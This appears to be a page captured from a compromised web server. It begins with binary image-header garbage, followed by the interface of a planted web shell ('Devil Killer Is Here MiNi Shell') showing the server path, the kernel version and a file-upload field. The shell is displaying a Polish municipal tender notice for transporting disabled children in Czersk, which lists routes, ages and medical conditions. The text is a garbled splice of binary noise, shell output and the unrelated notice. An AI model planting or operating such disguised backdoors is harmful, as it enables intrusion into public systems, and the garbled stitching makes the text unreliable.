JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240703/0039415101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dowożenie dzieci/uczniów/osób niepełnosprawnych z terenu Gminy Czersk w roku szkolnym 2024/2025 z podziałem na części” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ OBSŁUGI FINANSOWEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001112735</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">DWORCOWA 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czersk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-650</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(0-52) 398-45-30</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrektor@zof.czersk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zofczersk.mojbip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dowożenie dzieci/uczniów/osób niepełnosprawnych z terenu Gminy Czersk w roku szkolnym 2024/2025 z podziałem na części” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e1dfd29f-390b-11ef-b37c-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00394151</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00025077/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowoz osób niepełnosprawnych do OREW-ów, SP Nr 1 w Czersku, ZS Malachin i przedszkoli w Chojnicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/czersk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie<br/>ofert,wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem<br/>wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji<br/>elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług<br/>drogą elektroniczną. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl pod adresem:https://platformazakupowa.pl/pn/czersk Instrukcje korzystania z platformazakupowa.pl<br/>dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innychczynności podejmowanych w<br/>niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują sięw zakładce „Instrukcje dla Wykonawców&#34; na stronie<br/>internetowej pod adresem:https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">30.1.Rozszerzenia plików<br/>wykorzystywanych przez Wykonawców powinny być zgodne z załącznikiem nr 2 do „Rozporządzenia Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej<br/>oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI.30.2. Zamawiający<br/>rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf30.3. W celu<br/>ewentualnej kompresji danych zamawiający rekomenduje wykorzystanie jednego z rozszerzeń:30.3.1. .zip 30.3.2. .7Z<br/>30.4. Wśród rozszerzeń powszechnych a niewystępujących w rozporządzeniu KRI występują: .rar .gif .bmp .numbers .pages.<br/>Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. 30.5. Zamawiający zwraca uwagę na ograniczenia<br/>wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie<br/>10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który<br/>wynosi maksymalnie 5MB.<br/>30.6. W przypadku stosowania przez wykonawcę kwalifikowanego podpisu elektronicznego:30.6.1. ze względu na niskie ryzyko<br/>naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie<br/>plików składających się na ofertę na rozszerzenie .pdf i opatrzenie ich podpisem kwalifikowanym w formacie PAdES. 30.6.2. pliki w<br/>innych formatach niż pdf zaleca się opatrzyć podpisem w formacie XAdES o typie zewnętrznym. Wykonawca powinien pamiętać,<br/>aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.30.6.3. Zamawiający rekomenduje wykorzystanie podpisu z<br/>kwalifikowanym znacznikiem czasu.30.7. Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować<br/>podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do<br/>problemów w weryfikacji plików.30.8. Zamawiający zaleca, aby wykonawca z odpowiednim wyprzedzeniem przetestował możliwość<br/>prawidłowego wykorzystania<br/>wybranej metody podpisania plików oferty.30.9. Osobą składającą ofertę powinna być osoba kontaktowa podawana w<br/>dokumentacji.30.10. Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia<br/>publicznego i zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert. Sugerujemy złożenie oferty na 24<br/>godziny przed terminem składania ofert.30.11. Jeśli wykonawca pakuje dokumenty np. w plik o rozszerzeniu .zip zaleca się<br/>wcześniejsze podpisanie każdego ze skompresowanych plików. 30.12.Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian<br/>w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie<br/>z koniecznością odrzucenia oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 14 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia <br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) z dnia 27 kwietnia 2016 r. (Dz.Urz.UE.L Nr 119/1), zwanego dalej „RODO”, informuję, że: <br/><br/>1)	Administratorem Pani/Pana danych osobowych udostępnionych Zamawiającemu przez Wykonawcę w celu realizacji udzielonego zamówienia publicznego jest Zespół Obsługi Finansowej (ZOF) w Czersku, będący jednostką organizacyjną Gminy Czersk i reprezentowany przez Dyrektora ZOF w Czersku. Kontakt: 89-650 Czersk, ul. Dworcowa 31, tel. 52 398 40 35, e-mail: sekretariat@zof.czersk.pl .<br/><br/>2)	Pani/Pana dane osobowe przetwarzane będą zgodnie z art. 6 ust. 1 lit. c) RODO w związku z m.in. przepisami: <br/>a)	art. 438 Ustawy z dnia 11 września 2019 r. Prawo Zamówień Publicznych (Dz.U. 2023.1605 ze zm.) w celu wypełnienia warunków Umowy zawartej pomiędzy Zamawiającym, a Wykonawcą, w tym udokumentowania, że czynności w zakresie realizacji udzielonego zamówienia są realizowane przez osoby zatrudnione na umowę o pracę, w zw. z art. 33 i art. 44 ust. 3 i 4 ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (Dz.U.2023.1270 ze zm.), <br/>b)	art. 5-6 Ustawy z 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz.U. 2020.164 ze zm.). <br/><br/>3)	Odbiorcami Pani/Pana danych osobowych (z uwzględnieniem art. 86 RODO): <br/>a)	będą upoważnieni pracownicy Administratora Danych Osobowych, <br/>b)	mogą być podmioty upoważnione na podstawie przepisów prawa oraz podmioty, które przetwarzają dane osobowe na podstawie stosownych umów zawartych z Gminą Czersk lub/i z Zespołem Obsługi Finansowej w Czersku. <br/><br/>4)	Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celu <br/>dla jakiego zostały one zebrane, tj. przez czas trwania umowy, a następnie zgodnie z terminami archiwizacji określonymi przez przepisy szczególne. <br/><br/>5)	Obowiązek udostępnienia przez Panią/Pana lub Wykonawcę danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, a konsekwencje niepodania określonych danych wynikają z ustawy Pzp. <br/><br/>6)	Pani/Pana dane osobowe nie będą podlegać zautomatyzowanemu podejmowaniu decyzji przez Administratora Danych, w tym profilowaniu. <br/><br/>7)	Administrator danych nie zamierza przekazywać poza Europejski Obszar Gospodarczy lub do organizacji międzynarodowej Pani/Pana danych osobowych, ale należy uwzględnić jawność gospodarowania środkami publicznymi i postępowania o udzielenie zamówienia publicznego, co może skutkować przetwarzaniem tych danych poza ww. obszarem.<br/><br/>8)	Posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących *;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9)	Nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych, <br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, <br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, <br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO. <br/> <br/>10)	W sprawach z zakresu ochrony danych osobowych można kontaktować się z Inspektorem Ochrony Danych, telefonicznie: 52 395 48 54 lub pod adresem e-mail: iod@czersk.pl .<br/><br/>* Wyjaśnienie: w przypadku korzystania przez osobę, której dane osobowe są przetwarzane <br/>przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1-3 RODO, zamawiający może żądać <br/>od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. <br/><br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników. <br/><br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu <br/>do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej <br/>lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DYR.261.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.	Przedmiotem zamówienia jest: „Dowożenie dzieci/uczniów/osób niepełnosprawnych z terenu Gminy Czersk w roku szkolnym 2024/2025 z podziałem na części”<br/>Część 1: Ośrodka Rewalidacyjno-Edukacyjno-Wychowawczego w Czarnej Wodzie środkiem transportu o minimalnej liczbie miejsc siedzących z kierowcą – 9<br/><br/>1.	Przedmiotem zamówienia jest dowożenie osób do:<br/><br/>Część 1: Ośrodka Rewalidacyjno-Edukacyjno-Wychowawczego w Czarnej Wodzie środkiem transportu o minimalnej liczbie miejsc siedzących z kierowcą – 9 na następujących trasach:<br/><br/>-	Czersk – Będźmierowice – OREW Czarna Woda – Czersk – ok. 27,4 km (2 kursy dziennie) <br/>-	OREW Czarna Woda – Wojtal – Pustki – OREW Czarna Woda – ok. 28,3 km (2 kursy dziennie)<br/>Planowana liczba osób – 4, w tym:<br/>- z miejscowości Czersk – 3 osoby<br/>- z miejscowości Będźmierowice – 1 osoba<br/>- z miejscowości Pustki – 1 osoba<br/>- z miejscowości Wojtal – 1 osoba.<br/><br/>Łączny dzienny przebieg pojazdu ok. 111,4 km.<br/><br/>Dowożenie osób niepełnosprawnych odbywać się będzie w dni pracy ośrodka wg podanego przez dyrektora ośrodka: <br/>-	rozpoczęcie zajęć: godzina 8.00 <br/>-	zakończenie zajęć: w godzinach 13:00 – 14:00<br/><br/>Liczba osób niepełnosprawnych objętych przewozem może ulec zmianie z przyczyn niezależnych od Zamawiającego<br/><br/>UWAGA <br/>U dowożonych osób występują następujące schorzenia i dysfunkcje:<br/>1)	niepełnosprawność intelektualna w stopniu umiarkowanym, znacznym i głębokim<br/>2)	niepełnosprawność ruchowa<br/>3)	opóźnienie psycho-ruchowe<br/>4)	autyzm<br/>5)	zespół Aspergera<br/>6)	dziecięce porażenie mózgowe<br/><br/>Dowożone osoby są w wieku: 7, 12, 14, 19 i 20 lat.<br/>Dwie osoby niepełnosprawne wykazują agresję i samoagresję. Przewożone osoby mogą potrzebować pomocy przy wejściu lub wyjściu z pojazdu. Dwie osoby niepełnosprawne poruszają się na wózku inwalidzkim. Najmłodsze dziecko musi mieć zapewniony fotelik podczas jazdy. <br/>Wykonawca musi zapewnić opiekę dla przewożonych osób niepełnosprawnych na całej trasie przewozu.<br/>Osoby zatrudnione do sprawowania opieki muszą posiadać odpowiednie kwalifikacje. Opiekun sprawuje nadzór nad przewożonymi osobami niepełnosprawnymi i zobowiązany jest do udzielania czynnej pomocy osobom niepełnosprawnym w bezpiecznym zajęciu miejsca w pojeździe, opieki podczas trwania podróży, przy opuszczaniu pojazdu po jej zakończeniu i podczas przekazania przewożonej grupy osób personelowi ośrodka. <br/>Przed rozpoczęciem drogi powrotnej po zakończonych zajęciach w ośrodku, obowiązkiem opiekuna jest sprawdzenie, czy wszystkie dowiezione rano osoby powracają do miejsc zamieszkania. W przypadku braku jakiejkolwiek osoby niepełnosprawnej podróż powrotna nie może się rozpocząć bez uzyskania wyjaśnienia tej sprawy przez personel ośrodka, któremu osoba niepełnosprawna została przekazana w kursie porannym.<br/>W sposób szczególny traktowane być muszą osoby niepełnosprawne korzystające z wózka inwalidzkiego.<br/><br/>Kierowca nie może być jednocześnie opiekunem osób niepełnosprawnych. W pojeździe musi znajdować się kierowca i opiekun. <br/>5.2.	Przedmiot zamówienia szczegółowo został określony w opisie przedmiotu zamówienia, kosztorysach ofertowych oraz projektowanych postanowieniach umowy stanowiących załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Cena ofertowa brutto –„C”- 60% Z tytułu niniejszego kryterium max. Ilość punków: 60<br/>Termin płatności za fakturę – „T”- 40 % Z tytułu niniejszego kryterium max. Ilość punków: 40<br/>za oferowany termin płatności za fakturę do 14 dni - 0 punktów<br/>za oferowany termin płatności za fakturę do 30 dni - 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności za fakturę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.	Przedmiotem zamówienia jest: „Dowożenie dzieci/uczniów/osób niepełnosprawnych z terenu Gminy Czersk w roku szkolnym 2024/2025 z podziałem na części”<br/>Część 2: Ośrodka Rewalidacyjno-Edukacyjno-Wychowawczego w Piecach środkiem transportu o minimalnej liczbie miejsc siedzących z kierowcą – 9<br/><br/>1.	Przedmiotem zamówienia jest dowożenie osób do:<br/><br/>Część 2: Ośrodka Rewalidacyjno-Edukacyjno-Wychowawczego w Piecach środkiem transportu o minimalnej liczbie miejsc siedzących z kierowcą – 9 na następującej trasie:<br/><br/>-	Czersk – OREW Piece - Czersk– ok. 38 km (2 kursy dziennie) <br/>Planowana liczba dowożonych osób – 1<br/><br/>Łączny dzienny przebieg pojazdu 76 km.<br/><br/>Dowożenie osoby niepełnosprawnej odbywać się będzie w dni pracy ośrodka wg harmonogramu podanego przez dyrektora ośrodka: <br/>-	rozpoczęcie zajęć: godzina 7:30 <br/>-	zakończenie zajęć: w godzinach 12:30<br/><br/>Liczba osób niepełnosprawnych objętych przewozem może ulec zmianie z przyczyn niezależnych od Zamawiającego. <br/><br/>UWAGA <br/>U dowożonej osoby występują następujące schorzenia i dysfunkcje:<br/>1)	niepełnosprawność intelektualna w stopniu znacznym <br/>2)	autyzm<br/>3)	zespół Aspergera<br/>4)	wykazuje agresję i samoagresję<br/><br/>Dowożona osoba jest w wieku 14 lat.<br/>Wykonawca musi zapewnić opiekę dla przewożonej osoby niepełnosprawnej na trasie przewozu.<br/>Osoby zatrudnione do sprawowania opieki muszą posiadać odpowiednie kwalifikacje. Opiekun sprawuje nadzór nad przewożoną osobą niepełnosprawną i zobowiązany jest do udzielania jej czynnej pomocy w bezpiecznym zajęciu miejsca w pojeździe, opieki podczas trwania podróży, przy opuszczaniu pojazdu po jej zakończeniu i podczas przekazania przewożonej osoby personelowi ośrodka. <br/><br/>Kierowca nie może być jednocześnie opiekunem osób niepełnosprawnych. W pojeździe musi znajdować się kierowca i opiekun.<br/><br/>Przedmiot zamówienia szczegółowo został określony w opisie przedmiotu zamówienia, kosztorysach ofertowych oraz projektowanych postanowieniach umowy stanowiących załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu 